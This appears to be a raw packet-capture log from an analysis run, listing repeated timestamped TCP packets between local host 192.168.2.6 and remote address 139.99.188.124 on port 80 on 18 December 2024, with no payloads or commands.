                                                                    Dec 18, 2024 09:19:19.777149916 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.780343056 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.780639887 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.780703068 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.783621073 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.783755064 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.783838034 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.787110090 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.787173986 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.787244081 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.790477037 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.790549994 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.790611982 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.793814898 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.793843985 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.794130087 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.797035933 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.797137976 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.797288895 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.800407887 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.800559998 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.800612926 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.803744078 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.803885937 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.803942919 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.807128906 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.807209015 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.807351112 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.810462952 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.810585022 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.810636044 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.813802958 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.813927889 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.814115047 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.817153931 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.817301035 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.817436934 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.820595980 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.820655107 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.820713043 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.823898077 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.823971033 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.824042082 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.827235937 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.827342987 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.827408075 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.830632925 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.830677986 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.830776930 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.833987951 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.834134102 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.834180117 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.837490082 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.837507963 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.837567091 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.840647936 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.840728998 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.840797901 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.843975067 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.844089985 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.844142914 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.847381115 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.847440958 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.847508907 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.934142113 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.934257030 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.934293985 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.934314013 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.934330940 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.934420109 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.936659098 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.936744928 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.936788082 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.939268112 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.939376116 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.939415932 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.941541910 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.941643000 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.941732883 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.943953991 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.943967104 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.944011927 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.946355104 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.946484089 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.946530104 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.951200962 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.951217890 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.951260090 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.951812029 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.952313900 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.952373981 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.954535007 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.954668045 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.954760075 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.956662893 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.956937075 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.957019091 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.958595037 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.958939075 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.959072113 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.961163998 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.961333990 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.961379051 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.963265896 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.963332891 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.963511944 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.964373112 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.964512110 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.964551926 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.966577053 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.966682911 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.966844082 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.968694925 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.968812943 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.968954086 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.970868111 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.971040010 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.971092939 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.973295927 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.973352909 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.975008965 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.975054979 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.975162029 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.975217104 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.977160931 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.977206945 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.977267027 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.979243040 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.979384899 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.979429960 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.981340885 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.981482029 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.981528997 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.983439922 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.983484983 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.983566046 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.985549927 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.985665083 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.985713005 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.987652063 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.987721920 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.987903118 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.989749908 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.989885092 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.990034103 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.991811037 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.991916895 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.992002010 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.993922949 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.994039059 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.994080067 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.996140003 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.996306896 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.996352911 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.998121023 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.998218060 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.998260021 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.000248909 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.000313044 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.000514030 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.002310038 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.002336979 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.002372980 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.004424095 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.004542112 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.004646063 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.006483078 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.006583929 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.006685019 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.008579969 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.008685112 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.008738041 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.010685921 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.010838032 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.010891914 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.012779951 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.012892962 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.012934923 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.015053988 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.015186071 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.015244961 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.016999960 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.017070055 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.018300056 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.019090891 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.019192934 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.019244909 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.021146059 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.021282911 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.021325111 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.023294926 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.023416042 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.023462057 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.025567055 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.025702953 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.025753021 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.027471066 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.027574062 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.027618885 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.029567957 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.029628992 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.029687881 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.031644106 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.031773090 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.031827927 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.033737898 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.033852100 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.033909082 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.035882950 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.035978079 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.036030054 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.037930012 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.038028955 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.039084911 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.040018082 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.040129900 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.042114973 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.042229891 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.042275906 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.042319059 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.044194937 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.044311047 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.044363976 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.046310902 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.046437025 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.046818018 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.124131918 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.124160051 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.124238014 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.124593973 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.124701977 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.124833107 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.126261950 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.126368046 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.126410007 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.127908945 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.128034115 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.128082037 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.129579067 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.129684925 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.129739046 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.131113052 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.131225109 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.131272078 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.132742882 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.132821083 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.132904053 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.134294033 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.134365082 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.134404898 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.135819912 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.135915041 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.136009932 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.137331009 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.137454987 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.137500048 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.138835907 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.138900995 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.138952971 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.140371084 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.140465975 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.140665054 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.141856909 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.148085117 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.148150921 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.148165941 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.148719072 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.148758888 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.148834944 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.150120974 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.150171995 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.150218964 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.151799917 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.151813984 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.151854038 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.152910948 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.152987957 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.153032064 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.154295921 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.154362917 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.154412985 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.155666113 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.155785084 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.155828953 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.157038927 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.157098055 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.157177925 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.158413887 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.158458948 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.158461094 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.159739017 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.159799099 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.159827948 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.161155939 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.161211967 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.161243916 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.162442923 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.162483931 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.162523031 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.163806915 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.163882017 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.163923025 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.165121078 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.165160894 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.165196896 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.166479111 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.166522980 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.166563988 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.167781115 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.167838097 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.167864084 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.169048071 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.169104099 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.169171095 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.170365095 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.170407057 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.170428991 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.171622038 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.171736956 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.171755075 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.172924995 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.172966003 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.172996044 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.174304962 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.174376011 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.174454927 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.175930023 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.175951958 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.175971985 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.177719116 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.177743912 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.177769899 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.178560019 CET8049721139.99.188.124192.168.2.6
